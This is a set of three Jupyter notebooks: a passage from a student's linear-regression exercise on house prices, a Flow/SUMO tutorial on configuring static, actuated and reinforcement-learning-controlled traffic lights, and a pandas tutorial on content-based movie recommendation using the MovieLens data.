Closed Form Solution Recall: <br> $$\beta_0 = \bar {y} - \beta_1 \bar{x}$$ <br> $$\beta_1 = \frac {cov(x, y)} {var(x)}$$ <br> Below, let's define functions that will compute these parameters ``` # Pass the necessary arguments in the function to calculate the coefficients def compute_estimators(feature, target): n1 = np.sum(feature*target) - np.mean(target)*np.sum(feature) d1 = np.sum(feature*feature) - np.mean(feature)*np.sum(feature) # Compute the Intercept and Slope beta1 = n1/d1 beta0 = np.mean(target) - beta1*np.mean(feature) return beta0, beta1 # Return the Intercept and Slope ``` Run the compute estimators function above and display the estimated coefficients for any of the predictors/input variables. ``` # Remember to pass the correct arguments x_array = np.array(data1['living_area']) normalized_X = preprocessing.normalize([x_array]) beta0, beta1 = compute_estimators(normalized_X, data1['price']) print(beta0, beta1) #### Computing coefficients for our model by hand using the actual mathematical equations #y = beta1x + beta0 #print(y) ``` #### 1.2. sklearn solution Now that we know how to compute the estimators, let's leverage the sklearn module to compute the metrics for us. We have already imported the linear model, let's initialize the model and compute the coefficients for the model with the input above. ``` # Initilize the linear Regression model here model = linear_model.LinearRegression() # Pass in the correct inputs model.fit(data1[['living_area']], data1['price']) # Print the coefficients print("This is beta0:", model.intercept_) print("This is beta1:", model.coef_) #### Computing coefficients for our model using the sklearn package ``` Do the results from the cell above and your implementation match? They should be very close to each other. #### Yes!! They match! ### 2. Model Evaluation Now that we have estimated our single model. We are going to compute the coefficients for all the inputs. We can use a for loop for multiple model estimation. 
However, we need to create a few functions: 1\. Prediction function: Functions to compute the predictions <br> 2\. MSE: Function to compute Mean Square Error <br> ``` #Function that computes predictions of our model using the betas above + the feature data we've been using def model_predictions(intercept, slope, feature): """ Compute Model Predictions """ y_hat = intercept+(slope*feature) return y_hat y_hat = model_predictions(beta0, beta1, data1['living_area']) #Function to compute MSE which determines the total loss for each predicted data point in our model def mean_square_error(y_outcome, predictions): """ Compute the mean square error """ mse = (np.sum((y_outcome - predictions) ** 2))/np.size(predictions) return mse mse = mean_square_error(target, y_hat) print(mse) ``` The last function we need is a plotting function to visualize our predictions relative to our data. ``` #Function used to plot the data def plotting_model(feature, target, predictions, name): """ Create a scatter and predictions """ fig = plt.figure(figsize=(10,8)) plot_model = model.fit(feature, target) plt.scatter(x=feature, y=target, color='blue') plt.plot(feature, predictions, color='red') plt.xlabel(name) plt.ylabel('Price') return model model = plotting_model(data1[['living_area']], data1['price'], y_hat, data1['living_area'].name) ``` ## Considerations/Reasoning #### Data Integrity After my inital linear model based on the feature "living area," I've eliminated 8 data points. If you look at the graph above, there are 4 outliers that are clear, and at least 4 others that follow a similar trend based on the x, y relationship. I used ~3500 sqft of living area as my cutoff for being not predictive of the model, and any price above 600000. Given the way these data points skew the above model, they intuitively appear to be outliers with high leverage. I determined this by comparing these high leverag points with points similar to it in someway and determined whether it was an outlier (i.e. 
if point A's price was abnormally high, I found a point (B) with living area at or close to point A's living area and compared the price. vice versa if living area was abnormally high). #### Inital Feature Analysis - "Best" Feature (a priori) Living area is the best metric to use to train the linear model because it incorporates multiple of the other features within it: first floor living space & bath. Living area has a high correlation with both first floor sq ft (0.53) and baths (0.63). Based on the other correlations, these are the two highest, and thus should immediately be eliminated. Additionally, based on initial intuition, one would assume that an increase in the metric "firstfloor sqft" will lead to an increase in the "living area" metric; if both firstfloor sqft and overall living area are increased, the "bath" metric will likely also increase to accommodate the additional living area/sqft in a home. Thus, I will not need to use them in my model because these can be accurately represented by the feature "living area." ### Single Feature Assessment ``` #Running each feature through to determine which has best linear fit features = data[['living_area', 'garage_area', 'lot_area', 'firstfloor_sqft', 'bath']] count = 0 for feature in features: feature = features.iloc[:, count] # Compute the Coefficients beta0, beta1 = compute_estimators(feature, target) count+=1 # Print the Intercept and Slope print(feature.name) print('beta0:', beta0) print('beta1:', beta1) # Compute the Train and Test Predictions y_hat = model_predictions(beta0, beta1, feature) # Plot the Model Scatter name = feature.name model = plotting_model(feature.values.reshape(-1, 1), target, y_hat, name) # Compute the MSE mse = mean_square_error(target, y_hat) print('mean squared error:', mse) print() ``` #### Analysis of Feature Linear Models After eliminating these 8 data points, MSE for Living Area drop significantly from 8957196059.803959 to 2815789647.7664313. 
In fact, Living Area has the lowest MSE 2815789647.7664313 of all the individual models, and the best linear fit. Garage Area is the next lowest MSE 3466639234.8407283, and the model is mostly linear; however, the bottom left of the model is concerning. You'll notice that a large number of data points go vertically upward indicating an increase in price with 0 garage area. That says to me that garage area isn't predicting the price of these homes, which indicates that it may be a good feature to use in conjunction with another feature (i.e. Living Area) or since those data points do not fit in with the rest of the population, they may need to be removed. #### Run Model Assessment Now that we have our functions ready, we can build individual models, compute preductions, plot our model results and determine our MSE. Notice that we compute our MSE on the test set and not the train set ### Dot Product (multiple feature) Assessment ``` #Models Living Area alone and compares it to the Dot Product of Living Area with each other feature ##Determining if a MLR would be a better way to visualize the data features = data[['living_area', 'garage_area', 'lot_area', 'firstfloor_sqft', 'bath']] count = 0 for feature in features: feature = features.iloc[:, count] #print(feature.head(0)) if feature.name == 'living_area': x = data['living_area'] else: x = feature * data['living_area'] # Compute the Coefficients beta0, beta1 = compute_estimators(x, target) # Print the Intercept and Slope if feature.name == 'living_area': print('living_area') print('beta0:', beta0) print('beta1:', beta1) else: print(feature.name, "* living_area") print('beta0:', beta0) print('beta1:', beta1) # Compute the Train and Test Predictions y_hat = model_predictions(beta0, beta1, x) # Plot the Model Scatter if feature.name == 'living_area': name = 'living_area' else: name = feature.name + " " + "* living_area" model = plotting_model(x.values.reshape(-1, 1), target, y_hat, name) # Compute the MSE mse = 
mean_square_error(target, y_hat) print('mean squared error:', mse) print() count+=1 ``` ## Analysis Based on the models, it appears that two of the dot products provide a more accurate model: 1. Living Area * First Floor SqFt 2. Living Area * Garage Area These two dot products provide a lower MSE and thus lowers the loss per prediction point. #1. My intuition says that since Living Area, as a feature, will include First Floor SqFt in its data. The FirstFloor SqFt can be captured by Living Area, so it can be left out. Additionally, since one is included within the other, we cannot say anything in particular about Living Area or FirstFloor SqFt individually. Also, the correlation (Ln 24 & Out 24) between Living Area and FirstFloor SqFt is 0.53, which is the highest apart from Bath. This correlation is low in comparison to the "standard;" however, that standard is arbitrary. I've lowered it to be in context with data sets I'm working with in this notebook. #2. The dot product of Living Area & Garage Area provides doesn't allow us to make a statement about each individually, unless we provide a model of each, which I will do below. This dot product is a better model. Garage Area is advertised as 'bonus' space and CANNOT be included in the overall square footage of the home (i.e. living area). Thus, garage area vector will not be included as an implication within the living area vector making them linearly independent. Garage Area can be a sought after feature depending on a buyer's desired lifestlye; more garage space would be sought after by buyers with more cars, which allows us to draw a couple possible inferences about the buyers: 1. enough net worth/monthly to make payments on multiple vehicles plus make payments on a house/garage 2. 
enough disposable income to outright buy multiple vehicles plus make payments on a house/garage Additionally, it stands to reason that garage area would scale with living area for pragmatic reasons (more living area implies more people and potentially more vehicles) and for aesthetic reasons (more living area makes home look larger and would need larger garage). Homes with more living area and garage area may be sought after by buyers with the ability to spend more on a home, and thus the market would bear a higher price for those homes, which helps explain why living area * garage area is a better indicator of home price. #### Conclusion Combining living area with other features lowered the MSE for each. The lowest MSE is living area * garage area, which confirms my hypothesis: Living Area is the best feature to predict price, and garage area is good when used in conjunction. ``` #Modeling Living Area & Garage Area separately. features = data[['living_area', 'garage_area']] count = 0 for feature in features: feature = features.iloc[:, count] if feature.name == 'living_area': x = data['living_area'] elif feature.name == 'garage_area': x = data['garage_area'] beta0, beta1 = compute_estimators(x, target) count+=1 if feature.name == 'living_area': print('living_area') print('beta0:', beta0) print('beta1:', beta1) elif feature.name == 'garage_area': print('garage_area') print('beta0:', beta0) print('beta1:', beta1) y_hat = model_predictions(beta0, beta1, x) if feature.name == 'living_area': name = 'living_area' elif feature.name == 'garage_area': name = 'garage_area' model = plotting_model(x.values.reshape(-1, 1), target, y_hat, name) mse = mean_square_error(target, y_hat) print('mean squared error:', mse) print() #Modeling dot product of Living Area * Garage Area features = data[['living_area']] x = features.iloc[:, 0] x2 = x * data['garage_area'] #x3 = x2 * data['bath'] # Compute the Coefficients beta0, beta1 = compute_estimators(x2, target) # Print the Intercept and 
Slope print('Name: garage_area * living_area') print('beta0:', beta0) print('beta1:', beta1) # Compute the Train and Test Predictions y_hat_1 = model_predictions(beta0, beta1, x2) # Plot the Model Scatter name = 'garage_area * living_area' model = plotting_model(x2.values.reshape(-1, 1), target, y_hat_1, name) # Compute the MSE mse = mean_square_error(target, y_hat_1) print('mean squared error:', mse) print() ``` ## Reasoning Above, I modeled both living area and garage area by themselves then the dot product of Living Area * Garage Area to highlight the MSE of each vs. the MSE of the dot product. Garage Area, much more so than Living Area, has a high MSE indicating that on its own, Garage Area isn't the best predictor of a home's price; we must take the data in context with reality, and intuitively speaking, one wouldn't assume that the garage area, on its own, would be a feature indicative of price. This fact combined with the assumption/implication that garage may scale with living area implies some correlation between the features, which would go against the linear assumption of feature independence. As a matter of fact, there is a correlation between them (Ln 24 & Out 24) of 0.44; however, this isn't problematic for two reasons: 1. 0.44 is quite low in regard to typical correlation standards. 2. Data must be seen in context. #1. Although I eliminated First Floor SqFt due, in part, to a high correlation and that correclation is only 0.09 points lower. The main reason why First Floor SqFt is eliminated is due to its inclusion within the living area vector. Additionally, the main reason why I'm including garage area is because it is not included with the living area vector. #2. Similar to my #1 explanation, knowing that garage area is 'bonus space' and, as such, is NOT included in a home's advertised square feet indicates that it isn't within the Living Area data set in the same way FF SqFt or Baths would be. 
It will most likely scale with the living area independently of the living area, making it a good fit for a MLR.

### 3. Model Interpretation

Now that you have calculated all the individual models in the dataset, provide an analytics rationale for which model has performed best. To provide some additional assessment metrics, let's create a function to compute the R-Squared.

#### Mathematically:
$$R^2 = \frac {SS_{Regression}}{SS_{Total}} = 1 - \frac {SS_{Error}}{SS_{Total}}$$<br>
where:<br>
$SS_{Regression} = \sum (\widehat {y_i} - \bar {y_i})^2$<br>
$SS_{Total} = \sum ({y_i} - \bar {y_i})^2$<br>
$SS_{Error} = \sum ({y_i} - \widehat {y_i})^2$

```
# ssr = sum of squares of regression --> variance of the predictions from the mean
# sst = sum of squares total         --> variance of the actuals from the mean
# sse = sum of squares error         --> variance of the actuals from the predictions
def r_squared(y_outcome, predictions):
    """ Compute the R Squared (returned as a percentage) """
    ssr = np.sum((predictions - np.mean(y_outcome))**2)
    sst = np.sum((y_outcome - np.mean(y_outcome))**2)
    sse = np.sum((y_outcome - predictions)**2)
    # print(sse, "/", sst)
    print("1 - SSE/SST =", round((1 - (sse/sst))*100), "%")
    rss = (ssr/sst) * 100
    return rss
```

Now that we have R Squared calculated, evaluate the R Squared for the test group across all models and determine what model explains the data best.

```
rss = r_squared(target, y_hat_1)
print("R-Squared =", round(rss), "%")
```

### R-Squared Adjusted
$R^2-adjusted = 1 - \frac {(1-R^2)(n-1)}{n-k-1}$

```
def r_squared_adjusted(rss, sample_size, regressors):
    """ Compute the adjusted R Squared (returned as a percentage).

    rss         -- R-squared as a percentage (the output of r_squared above)
    sample_size -- array-like whose size gives n, the number of observations
    regressors  -- k, the number of predictors in the model
    """
    n = np.size(sample_size)
    k = regressors
    r2 = rss / 100  # r_squared returns a percentage; the formula needs a proportion
    numerator = (1 - r2) * (n - 1)  # (n - 1), per the formula above
    denominator = n - k - 1
    rssAdj = 1 - (numerator / denominator)
    return rssAdj * 100  # back to a percentage for printing

rssAdj = r_squared_adjusted(rss, y_hat_1, 2)
print(round(rssAdj), "%")
```

### 4. Model Diagnostics

Linear regression depends on meeting the assumptions of the model.
While we have not yet talked about the assumptions, your goal is to research and develop an intuitive understanding of why the assumptions make sense. We will walk through this portion in the Multiple Linear Regression Project.
github_jupyter
# Tutorial 10: Traffic Lights This tutorial walks through how to add traffic lights to experiments. This tutorial will use the following files: * Experiment script for RL version of traffic lights in grid: `examples/rllib/traffic_light_grid.py` * Experiment script for non-RL version of traffic lights in grid: `examples/sumo/traffic_light_grid.py` * Network: `traffic_light_grid.py` (class TrafficLightGridNetwork) * Environment for RL version of traffic lights in grid: (class TrafficLightGridEnv) * Environment for non-RL version of traffic lights in grid: (class AccelEnv) There are two main classes of traffic lights that Sumo supports: (1) actuated and (2) static traffic lights. This tutorial will cover both types. Moreover, in this tutorial, we'll discuss another type of traffic light. In total, we have 4 types of traffic lights in the Flow: 1. Static Traffic Lights --> (Section 3) 2. Actuated Traffic Lights --> (Section 4) 3. Actuated Baseline Traffic Lights --> (Section 5) 4. RL Traffic Lights --> (Section 6) Let's begin! First, import all necessary classes. ``` from flow.core.params import NetParams from flow.networks.grid import TrafficLightGridNetwork from flow.core.params import TrafficLightParams from flow.core.params import SumoParams, EnvParams, InitialConfig, NetParams, \ InFlows, SumoCarFollowingParams from flow.core.params import VehicleParams import numpy as np ``` ## 1. New parameters in `additional_net_params` There are a few unique additions to `additional_net_params` in the traffic light grid environments to be aware of. They are the following 2 items: #### grid_array `grid_array` passes information on the road network to the network, specifying the parameters you see below: `row_num`, `col_num`, `inner_length`, `short_length`, `long_length`, `cars_top`, `cars_bot`, `cars_left`, `cars_right`. This is required for any traffic light grid experiment. 
#### tl_logic `tl_logic` should be used for users who want to exert more control over individual traffic lights. `tl_logic` simply tells the env whether the traffic lights are controlled by RL or whether a default pattern or SUMO actuation is to be used. Use "actuated" if you want SUMO to control the traffic lights. For this tutorial, we will assume the following parameters for the `grid_array`, which specifies a traffic light grid network with 2 rows and 3 columns. `traffic_lights` should be set to `True` for every experiment in this tutorial. ``` inner_length = 300 long_length = 500 short_length = 300 n = 2 # rows m = 3 # columns num_cars_left = 20 num_cars_right = 20 num_cars_top = 20 num_cars_bot = 20 tot_cars = (num_cars_left + num_cars_right) * m \ + (num_cars_top + num_cars_bot) * n grid_array = {"short_length": short_length, "inner_length": inner_length, "long_length": long_length, "row_num": n, "col_num": m, "cars_left": num_cars_left, "cars_right": num_cars_right, "cars_top": num_cars_top, "cars_bot": num_cars_bot} ``` ## 2. Defining Traffic Light Phases To start off, we define how SUMO represents traffic light phases. A phase is defined as the states that the traffic lights around an intersection can take. The phase of a typical four-way, traffic-light-controlled intersection is modeled by a string (of length 4, 8, or 12, etc., depending on the structure of the intersection). Consider the phase "GrGr". Every letter in this phase string ("G", "r", "G", "r") corresponds to a signal of an edge in the intersection, in clockwise order (starting from the northbound). Explicitly, the northern and southern edges of the intersection both have a state of "G" (green), where the eastern and western edges of the intersection both have a state of "r" (red). In this example, the intersection has 4 edges, each edge has one lane, and the only possible direction is going straight. 
Each character within a phase's state describes the state of one signal of the traffic light. Please note, that a single lane may contain several signals - for example one for vehicles turning left and one for vehicles which move straight (in this case, we may have something like "GgrrGgrr"). In other words, a signal does not control lanes, but links - each connecting a lane which is incoming into a junction to one which is outgoing from this junction. For more information about traffic light states, please refer to https://sumo.dlr.de/wiki/Simulation/Traffic_Lights#Signal_state_definitions NOTE: If the API is used at any point to modify the traffic light state, i.e. functions such as `setRedYellowGreenState`, this will override the traffic light's default phase. To do anything with traffic lights, you should interface with Flow's `TrafficLightParams` class Once the `TrafficLightParams` class is instantiated, traffic lights can be added via the `add` function. One prerequisite of using this function is knowing the node id of any node you intend to manipulate. This information is baked into the experiment's network class, as well as the experiment's `nod.xml` file. For the experiment we are using with 2 rows and 3 columns, there are 6 nodes: "center0" to "center5". This will be the ordering of "centers" in our network: ``` | | | -3-4-5- | | | -0-1-2- | | | tl_logic = TrafficLightParams() nodes = ["center0", "center1", "center2", "center3", "center4", "center5"] phases = [{"duration": "31", "state": "GrGr"}, {"duration": "6", "state": "yryr"}, {"duration": "31", "state": "rGrG"}, {"duration": "6", "state": "ryry"}] ``` In this particular example, each of the 6 intersections corresponds to the same set of possible phases; in other words, at any time, all intersections will be at the same phase in this example. 
``` for node_id in nodes: tl_logic.add(node_id, tls_type="static", programID="1", offset=None, phases=phases) ``` You can, however, customize a network in which each traffic light node has different phases. Following this step, the instance `tl_logic` of `TrafficLightParams` class should be passed into the network as element `traffic_lights`. ``` additional_net_params = {"grid_array": grid_array, "speed_limit": 35, "horizontal_lanes": 1, "vertical_lanes": 1, "traffic_lights": True} net_params = NetParams(no_internal_links=False, additional_params=additional_net_params) network = TrafficLightGridNetwork(name="grid", vehicles=VehicleParams(), net_params=net_params, initial_config=InitialConfig(), traffic_lights=tl_logic) ``` That's it! The traffic light logic will be passed into Flow's internals, which will generate an additional file containing all of the information needed to generate the traffic lights you specified in the simulation. ## 3. Static Traffic Lights Static traffic lights are traffic lights with pre-defined phases. They cannot dynamically adjust according to the traffic needs; they simply follow the same pattern repeatedly. To see static traffic lights in action, the `TrafficLightParams` object should be instantiated with `baseline=False`. When adding individual traffic lights, the following parameters in addition to `node_id` are involved: * `tls_type`: _[optional]_ str, specifies actuated or static traffic lights, defaults to static * `programID`: _[optional]_ str, the program name for this traffic light. 
It cannot be the same ID as the base program, which is 0; defaults to 10
* `offset`: _[optional]_ int, the initial time offset of the program

An example of adding one static traffic light to our system is as follows:

```
tl_logic = TrafficLightParams(baseline=False)
phases = [{"duration": "31", "state": "GrGr"},
          {"duration": "6", "state": "yryr"},
          {"duration": "31", "state": "rGrG"},
          {"duration": "6", "state": "ryry"}]
tl_logic.add("center0", phases=phases, programID=1)
```

## 4. Actuated Traffic Lights

For more flexibility than the static traffic lights defined above, and more control than RL-controlled traffic lights, actuated traffic lights are a good option to consider.

To explain the actuated traffic lights, we refer to an excerpt from SUMO's documentation: "SUMO supports gap-based actuated traffic control. This control scheme is common in Germany and works by prolonging traffic phases whenever a continuous stream of traffic is detected. It switches to the next phase after detecting a sufficient time gap between successive vehicles. This allows for better distribution of green-time among phases and also affects cycle duration in response to dynamic traffic conditions."

The difference between phases for static and actuated traffic lights is that actuated traffic lights have two additional parameters in `phases`, namely `minDur` and `maxDur`, which describe the allowed range of time durations for each phase. `minDur` is the minimum duration the phase will be held for, and `maxDur` is the maximum duration the phase will be held for.

In addition to these parameters of `phases` and all the required parameters of static traffic lights, the following optional parameters are involved.
The default values are set by SUMO: * `maxGap`: _[optional]_ int, describes the maximum time gap between successive vehicle sthat will cause the current phase to be prolonged * `detectorGap`: _[optional]_ int, determines the time distance between the (automatically generated) detector and the stop line in seconds (at each lane's maximum speed) * `showDetectors`: _[optional]_ bool, toggles whether or not detectors are shown in sumo-gui * `file`: _[optional]_ str, the file into which the detector shall write results * `freq`: _[optional]_ int, the period over which collected values shall be aggregated An example of adding two actuated traffic lights to our system is as follows. The first trafic lights corresponds to more custom control, while the second one specifies minimal control. ``` tl_logic = TrafficLightParams(baseline=False) phases = [{"duration": "31", "minDur": "8", "maxDur": "45", "state": "GrGr"}, {"duration": "6", "minDur": "3", "maxDur": "6", "state": "yryr"}, {"duration": "31", "minDur": "8", "maxDur": "45", "state": "rGrG"}, {"duration": "6", "minDur": "3", "maxDur": "6", "state": "ryry"}] tl_logic.add("center1", tls_type="actuated", programID="1", phases=phases, maxGap=5.0, detectorGap=0.9, showDetectors=False) tl_logic.add("center2", tls_type="actuated") ``` ## 5. Actuated Baseline Traffic Lights We have developed an actuated traffic light "baseline" that can be used for any experiments on a grid. This baseline uses actuated traffic lights (section 4), and has been fine-tuned on many iterations of experiments with varying parameters. The actual parameters are located in the `TrafficLightParams` class under the getter function `actuated_default()`. 
For reference, these values are: ``` tl_type = "actuated" program_id = 1 max_gap = 3.0 detector_gap = 0.8 show_detectors = True phases = [{"duration": "31", "minDur": "8", "maxDur": "45", "state": "GrGr"}, {"duration": "6", "minDur": "3", "maxDur": "6", "state": "yryr"}, {"duration": "31", "minDur": "8", "maxDur": "45", "state": "rGrG"}, {"duration": "6", "minDur": "3", "maxDur": "6", "state": "ryry"}] ``` To see the actuated baseline traffic lights in action, simply initialize the TrafficLightParams class with the `baseline` argument set to `True`, and pass it into the `additional_net_params`. Nothing else needs to be done; no traffic lights need to be added. ``` tl_logic = TrafficLightParams(baseline=True) additional_net_params = {"grid_array": grid_array, "speed_limit": 35, "horizontal_lanes": 1, "vertical_lanes": 1, "traffic_lights": True, "tl_logic": tl_logic} ``` ## 6. Controlling Your Traffic Lights via RL This is where we switch from the non-RL experiment script to the RL experiment. To control traffic lights via RL, no `tl_logic` element is necessary. This is because the RL agent is controlling all the parameters you were able to customize in the prior sections. The `additional_net_params` should look something like this: ``` additional_net_params = {"speed_limit": 35, "grid_array": grid_array, "horizontal_lanes": 1, "vertical_lanes": 1, "traffic_lights": True} ``` This will enable the program to recognize all nodes as traffic lights. The experiment then gives control to the environment; we are using `TrafficLightGridEnv`, which is an environment created for applying RL-specified traffic light actions (e.g. change the state) via TraCI. This is all you need to run an RL experiment! It is worth taking a look at the `TrafficLightGridEnv` class to further understanding of the experiment internals. 
The rest of this tutorial is an optional walkthrough through the various components of `TrafficLightGridEnv`: ### Keeping Track of Traffic Light State Flow keeps track of the traffic light states (i.e. for each intersection, time elapsed since the last change, which direction traffic is flowing, and whether or not the traffic light is currently displaying yellow) in the following variables: ``` # keeps track of the last time the traffic lights in an intersection were allowed to change (the last time the lights were allowed to change from a red-green state to a red-yellow state.). self.last_change = np.zeros((self.rows * self.cols, 1)) # keeps track of the direction of the intersection (the direction that is currently being allowed to flow. 0 indicates flow from top to bottom, and 1 indicates flow from left to right.) self.direction = np.zeros((self.rows * self.cols, 1)) # value of 1 indicates that the intersection is in a red-yellow state (traffic lights are red for one way (e.g. north-south), while the traffic lights for the other way (e.g. west-east) are yellow . 0 indicates that the intersection is in a red-green state. self.currently_yellow = np.zeros((self.rows * self.cols, 1)) ``` * The variable `self.last_change` indicates the last time the lights were allowed to change from a red-green state to a red-yellow state. * The variable `self.direction` indicates the direction of the intersection, i.e. the direction that is currently being allowed to flow. 0 indicates flow from top to bottom, and 1 indicates flow from left to right. * The variable `self.currently_yellow` with a value of 1 indicates that the traffic light is in a red-yellow state. 0 indicates that the traffic light is in a red-green state. `self.last_change` is contingent on an instance variable `self.min_switch_time`. This is a variable that can be set in `additional_env_params` with the key name `switch_time`. 
Setting `switch_time` enables more control over the RL experiment by preventing traffic lights from switching until `switch_time` timesteps have occurred. In practice, this can be used to prevent flickering. ``` additional_env_params = {"target_velocity": 50, "switch_time": 3.0} ``` ### Elements of RL for Controlling Traffic Lights #### Action Space The action space may be any set of actions the user wishes the agent to do. In this example, the action space for RL-controlled traffic lights directly matches the number of traffic intersections in the system. Each intersection (traffic light node) corresponds to an action. The action space is thus defined as: ``` @property def action_space(self): if self.discrete: return Discrete(2 ** self.num_traffic_lights) else: return Box( low=0, high=1, shape=(self.num_traffic_lights,), dtype=np.float32) ``` In the case that the action space is discrete, we need 1-bit (that can be 0 or 1) for the action of each traffic light node. Hence, we need `self.num_traffic_lights` bits to represent the action space. To make a `self.num_traffic_lights`-bit number, we use the pyhton's `Discrete(range)`, and since we have `self.num_traffic_lights` bits, the `range` will be 2^`self.num_traffic_lights`. In the case that the action space is continuous, we use a range (that is currently (0,1)) of numbers for each traffic light node. Hence, we will define `self.num_traffic_lights` "Boxes", each in the range (0,1). Note that the variable `num_traffic_lights` is actually the number of intersections in the grid system, not the number of traffic lights. Number of traffic lights in our example is 4 times the number of intersections #### Observation Space The observation space may be any set of state information the user wishes to provide to the agent. This information may fully or partially describe the state of the environment. The existing observation space for this example is designed to be a fully observable state space with the following metrics. 
For each vehicle, we want to know its velocity, its distance (in [unit]) from the next intersection, and the unique edge it is traveling on.
``` def get_state(self): # compute the normalizers grid_array = self.net_params.additional_params["grid_array"] max_dist = max(grid_array["short_length"], grid_array["long_length"], grid_array["inner_length"]) # get the state arrays speeds = [ self.k.vehicle.get_speed(veh_id) / self.k.network.max_speed() for veh_id in self.k.vehicle.get_ids() ] dist_to_intersec = [ self.get_distance_to_intersection(veh_id) / max_dist for veh_id in self.k.vehicle.get_ids() ] edges = [ self._convert_edge(self.k.vehicle.get_edge(veh_id)) / (self.k.network.network.num_edges - 1) for veh_id in self.k.vehicle.get_ids() ] state = [ speeds, dist_to_intersec, edges, self.last_change.flatten().tolist(), self.direction.flatten().tolist(), self.currently_yellow.flatten().tolist() ] return np.array(state) ``` #### Reward The agents in an RL network will learn to maximize a certain reward. This objective can be defined in terms of maximizing rewards or minimizing the penalty. In this example, we penalize the large delay and boolean actions that indicate a switch (with the negative sign). ``` def compute_reward(self, rl_actions, **kwargs): return - rewards.min_delay_unscaled(self) - rewards.boolean_action_penalty(rl_actions >= 0.5, gain=1.0) ``` #### Apply RL Actions In the `_apply_rl_actions` function, we specify what actions our agents should take in the environment. In this example, the agents (traffic light nodes) decide based on the action value how to change the traffic lights. ``` def _apply_rl_actions(self, rl_actions): """See class definition.""" # check if the action space is discrete if self.discrete: # convert single value to list of 0's and 1's rl_mask = [int(x) for x in list('{0:0b}'.format(rl_actions))] rl_mask = [0] * (self.num_traffic_lights - len(rl_mask)) + rl_mask else: # convert values less than 0.5 to zero and above 0.5 to 1. 
0 # indicates that we should not switch the direction, and 1 indicates # that switch should happen rl_mask = rl_actions > 0.5 # Loop through the traffic light nodes for i, action in enumerate(rl_mask): if self.currently_yellow[i] == 1: # currently yellow # Code to change from yellow to red ... else: # Code to change to yellow ... ``` These are the portions of the code that are hidden from the above code for shortening the code: ``` # Code to change from yellow to red self.last_change[i] += self.sim_step # Check if our timer has exceeded the yellow phase, meaning it # should switch to red if self.last_change[i] >= self.min_switch_time: if self.direction[i] == 0: self.k.traffic_light.set_state( node_id='center{}'.format(i), state="GrGr") else: self.k.traffic_light.set_state( node_id='center{}'.format(i), state='rGrG') self.currently_yellow[i] = 0 # Code to change to yellow if action: if self.direction[i] == 0: self.k.traffic_light.set_state( node_id='center{}'.format(i), state='yryr') else: self.k.traffic_light.set_state( node_id='center{}'.format(i), state='ryry') self.last_change[i] = 0.0 self.direction[i] = not self.direction[i] self.currently_yellow[i] = 1 ```
github_jupyter
<a href="https://www.bigdatauniversity.com"><img src = "https://ibm.box.com/shared/static/cw2c7r3o20w9zn8gkecaeyjhgw3xdgbj.png" width = 400, align = "center"></a> <h1 align=center><font size = 5>CONTENT-BASED FILTERING</font></h1> Recommendation systems are a collection of algorithms used to recommend items to users based on information taken from the user. These systems have become ubiquitous can be commonly seen in online stores, movies databases and job finders. In this notebook, we will explore Content-based recommendation systems and implement a simple version of one using Python and the Pandas library. ### Table of contents <div class="alert alert-block alert-info" style="margin-top: 20px"> - <p><a href="#ref1">Acquiring the Data</a></p> - <p><a href="#ref2">Preprocessing</a></p> - <p><a href="#ref3">Content-Based Filtering</a></p> <p></p> </div> <br> <a id="ref1"></a> # Acquiring the Data To acquire and extract the data, simply run the following Bash scripts: Dataset acquired from [GroupLens](http://grouplens.org/datasets/movielens/). Lets download the dataset. To download the data, we will use **`!wget`**. To download the data, we will use `!wget` to download it from IBM Object Storage. __Did you know?__ When it comes to Machine Learning, you will likely be working with large datasets. As a business, where can you host your data? IBM is offering a unique opportunity for businesses, with 10 Tb of IBM Cloud Object Storage: [Sign up now for free](http://cocl.us/ML0101EN-IBM-Offer-CC) ``` !wget -O moviedataset.zip https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/ML0101ENv3/labs/moviedataset.zip print('unziping ...') !unzip -o -j moviedataset.zip ``` Now you're ready to start working with the data! 
<a id="ref2"></a> # Preprocessing First, let's get all of the imports out of the way: ``` #Dataframe manipulation library import pandas as pd #Math functions, we'll only need the sqrt function so let's import only that from math import sqrt import numpy as np import matplotlib.pyplot as plt %matplotlib inline ``` Now let's read each file into their Dataframes: ``` #Storing the movie information into a pandas dataframe movies_df = pd.read_csv('movies.csv') #Storing the user information into a pandas dataframe ratings_df = pd.read_csv('ratings.csv') #Head is a function that gets the first N rows of a dataframe. N's default is 5. movies_df.head() ``` Let's also remove the year from the __title__ column by using pandas' replace function and store in a new __year__ column. ``` #Using regular expressions to find a year stored between parentheses #We specify the parantheses so we don't conflict with movies that have years in their titles movies_df['year'] = movies_df.title.str.extract('(\(\d\d\d\d\))',expand=False) #Removing the parentheses movies_df['year'] = movies_df.year.str.extract('(\d\d\d\d)',expand=False) #Removing the years from the 'title' column movies_df['title'] = movies_df.title.str.replace('(\(\d\d\d\d\))', '') #Applying the strip function to get rid of any ending whitespace characters that may have appeared movies_df['title'] = movies_df['title'].apply(lambda x: x.strip()) movies_df.head() ``` With that, let's also split the values in the __Genres__ column into a __list of Genres__ to simplify future use. This can be achieved by applying Python's split string function on the correct column. 
``` #Every genre is separated by a | so we simply have to call the split function on | movies_df['genres'] = movies_df.genres.str.split('|') movies_df.head() ``` Since keeping genres in a list format isn't optimal for the content-based recommendation system technique, we will use the One Hot Encoding technique to convert the list of genres to a vector where each column corresponds to one possible value of the feature. This encoding is needed for feeding categorical data. In this case, we store every different genre in columns that contain either 1 or 0. 1 shows that a movie has that genre and 0 shows that it doesn't. Let's also store this dataframe in another variable since genres won't be important for our first recommendation system. ``` #Copying the movie dataframe into a new one since we won't need to use the genre information in our first case. moviesWithGenres_df = movies_df.copy() #For every row in the dataframe, iterate through the list of genres and place a 1 into the corresponding column for index, row in movies_df.iterrows(): for genre in row['genres']: moviesWithGenres_df.at[index, genre] = 1 #Filling in the NaN values with 0 to show that a movie doesn't have that column's genre moviesWithGenres_df = moviesWithGenres_df.fillna(0) moviesWithGenres_df.head() ``` Next, let's look at the ratings dataframe. ``` ratings_df.head() ``` Every row in the ratings dataframe has a user id associated with at least one movie, a rating and a timestamp showing when they reviewed it. We won't be needing the timestamp column, so let's drop it to save on memory. ``` #Drop removes a specified row or column from a dataframe ratings_df = ratings_df.drop('timestamp', 1) ratings_df.head() ``` <a id="ref3"></a> # Content-Based recommendation system Now, let's take a look at how to implement __Content-Based__ or __Item-Item recommendation systems__. 
This technique attempts to figure out what a user's favourite aspects of an item are, and then recommends items that present those aspects.
